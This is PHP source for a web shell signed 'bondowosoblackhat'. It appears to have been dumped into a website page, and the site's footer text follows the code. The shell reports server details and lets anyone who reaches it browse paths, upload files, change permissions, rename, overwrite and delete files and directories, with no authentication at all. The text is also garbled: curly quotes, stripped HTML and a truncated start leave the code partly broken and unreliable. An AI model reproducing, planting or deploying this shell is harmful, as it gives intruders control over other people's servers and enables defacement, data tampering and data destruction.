$value){
$_POST[$key] = stripslashes($value);
}
}

echo ‘


Shell By bondowosoblackhat

Shell By bondowosoblackhat


[+] bondowosoblackhat [+]

‘;
echo “


: “.$_SERVER[‘REMOTE_ADDR’].”


: “.gethostbyname($_SERVER[‘HTTP_HOST’]).” / “.$_SERVER[‘SERVER_NAME’].”


: “.php_uname().”

“;

echo ‘

‘;
if(isset($_GET[‘filesrc’])){
echo “

‘;

if(isset($_GET[‘path’])){
$path = $_GET[‘path’];
}else{
$path = getcwd();
}
$path = str_replace(‘\\’,’/’,$path);
$paths = explode(‘/’,$path);

foreach($paths as $id=>$pat){
if($pat == ” && $id == 0){
$a = true;
echo ‘ : /‘;
continue;
}
if($pat == ”) continue;
echo ‘‘.$pat.’/’;
}

//upload
echo ‘

Upload File:
‘;
if(isset($_FILES[‘file’])){
if(copy($_FILES[‘file’][‘tmp_name’],$path.’/’.$_FILES[‘file’][‘name’])){
echo ‘

UPLOAD SUCCES !!!!
‘;
}else{
echo ‘‘;
}
}

echo ‘
files >> “;
echo $_GET[‘filesrc’];
echo ‘

‘;
echo(‘ ‘);
}elseif(isset($_GET[‘option’]) && $_POST[‘opt’] != ‘delete’){
echo ‘

‘.$_POST[‘path’].’

‘;

//Chmod
if($_POST[‘opt’] == ‘chmod’){
if(isset($_POST[‘perm’])){
if(chmod($_POST[‘path’],$_POST[‘perm’])){
echo ‘

CHANGE PERMISSION SUCCESS !!
‘;
}else{
echo ‘‘;
}
}
echo ‘

Permission :



‘;
}

//rename folder
elseif($_GET[‘opt’] == ‘btw’){
$cwd = getcwd();
echo ‘

New Name :



‘;
}

//rename file
elseif($_POST[‘opt’] == ‘rename’){
if(isset($_POST[‘newname’])){
if(rename($_POST[‘path’],$path.’/’.$_POST[‘newname’])){
echo ‘

CHANGE NAME SUCCESS !!
‘;
}else{
echo ‘‘;
}
$_POST[‘name’] = $_POST[‘newname’];
}
echo ‘

New Name :



‘;
}

//edit file
elseif($_POST[‘opt’] == ‘edit’){
if(isset($_POST[‘src’])){
$fp = fopen($_POST[‘path’],’w’);
if(fwrite($fp,$_POST[‘src’])){
echo ‘

EDIT FILE SUCCESS !!
‘;
}else{
echo ‘‘;
}
fclose($fp);
}
echo ‘





‘;
}
echo ‘

‘;
}else{
echo ‘

‘;

//delete dir
if(isset($_GET[‘option’]) && $_POST[‘opt’] == ‘delete’){
if($_POST[‘type’] == ‘dir’){
if(rmdir($_POST[‘path’])){
echo ‘

DELETE DIR SUCCESS !!
‘;
}else{
echo ‘>’;
}
}

//delete file
elseif($_POST[‘type’] == ‘file’){
if(unlink($_POST[‘path’])){
echo ‘

DELETE FILE SUCCESS !!
‘;
}else{
echo ‘‘;
}
}
}

?>
‘;
$scandir = scandir($path);
$pa = getcwd();
echo ‘

‘;

foreach($scandir as $dir){
if(!is_dir(“$path/$dir”) || $dir == ‘.’ || $dir == ‘..’) continue;
echo “

“;
}

echo ‘

‘;
foreach($scandir as $file){
if(!is_file(“$path/$file”)) continue;
$size = filesize(“$path/$file”)/1024;
$size = round($size,3);
if($size >= 1024){
$size = round($size/1024,2).’ MB’;
}else{
$size = $size.’ KB’;
}

echo “

“;
}
echo ‘

Name
Size
Perm
Options
$dir
DIR
“;
if(is_writable(“$path/$dir”)) echo ‘‘;
elseif(!is_readable(“$path/$dir”)) echo ‘‘;
echo perms(“$path/$dir”);
if(is_writable(“$path/$dir”) || !is_readable(“$path/$dir”)) echo ‘‘;

echo “





\” style=\”margin-top:6px;width:27;font-family:Kelly Slab;font-size:15;background:black;color:lime;border:2px solid lime;border-radius:5px\”/>
$file
“.$size.”
“;
if(is_writable(“$path/$file”)) echo ‘‘;
elseif(!is_readable(“$path/$file”)) echo ‘‘;
echo perms(“$path/$file”);
if(is_writable(“$path/$file”) || !is_readable(“$path/$file”)) echo ‘‘;

echo “





\” style=\”margin-top:6px;width:27;font-family:Kelly Slab;font-size:15;background:black;color:lime;border:2px solid lime;border-radius:5px\”/>

‘;
}
echo ‘


Copyright ©2017 || bondowosoblackhat


‘;
function perms($file){
$perms = fileperms($file);

if (($perms & 0xC000) == 0xC000) {
// Socket
$info = ‘s’;
} elseif (($perms & 0xA000) == 0xA000) {
// Symbolic Link
$info = ‘l’;
} elseif (($perms & 0x8000) == 0x8000) {
// Regular
$info = ‘-‘;
} elseif (($perms & 0x6000) == 0x6000) {
// Block special
$info = ‘b’;
} elseif (($perms & 0x4000) == 0x4000) {
// Directory
$info = ‘d’;
} elseif (($perms & 0x2000) == 0x2000) {
// Character special
$info = ‘c’;
} elseif (($perms & 0x1000) == 0x1000) {
// FIFO pipe
$info = ‘p’;
} else {
// Unknown
$info = ‘u’;
}

// Owner
$info .= (($perms & 0x0100) ? ‘r’ : ‘-‘);
$info .= (($perms & 0x0080) ? ‘w’ : ‘-‘);
$info .= (($perms & 0x0040) ?
(($perms & 0x0800) ? ‘s’ : ‘x’ ) :
(($perms & 0x0800) ? ‘S’ : ‘-‘));

// Group
$info .= (($perms & 0x0020) ? ‘r’ : ‘-‘);
$info .= (($perms & 0x0010) ? ‘w’ : ‘-‘);
$info .= (($perms & 0x0008) ?
(($perms & 0x0400) ? ‘s’ : ‘x’ ) :
(($perms & 0x0400) ? ‘S’ : ‘-‘));

// World
$info .= (($perms & 0x0004) ? ‘r’ : ‘-‘);
$info .= (($perms & 0x0002) ? ‘w’ : ‘-‘);
$info .= (($perms & 0x0001) ?
(($perms & 0x0200) ? ‘t’ : ‘x’ ) :
(($perms & 0x0200) ? ‘T’ : ‘-‘));

return $info;
}
?>

Most Recent Projects
Contact Us

We're not around right now. But you can send us an email and we'll get back to you, asap.

Not readable? Change text. captcha txt

Start typing and press Enter to search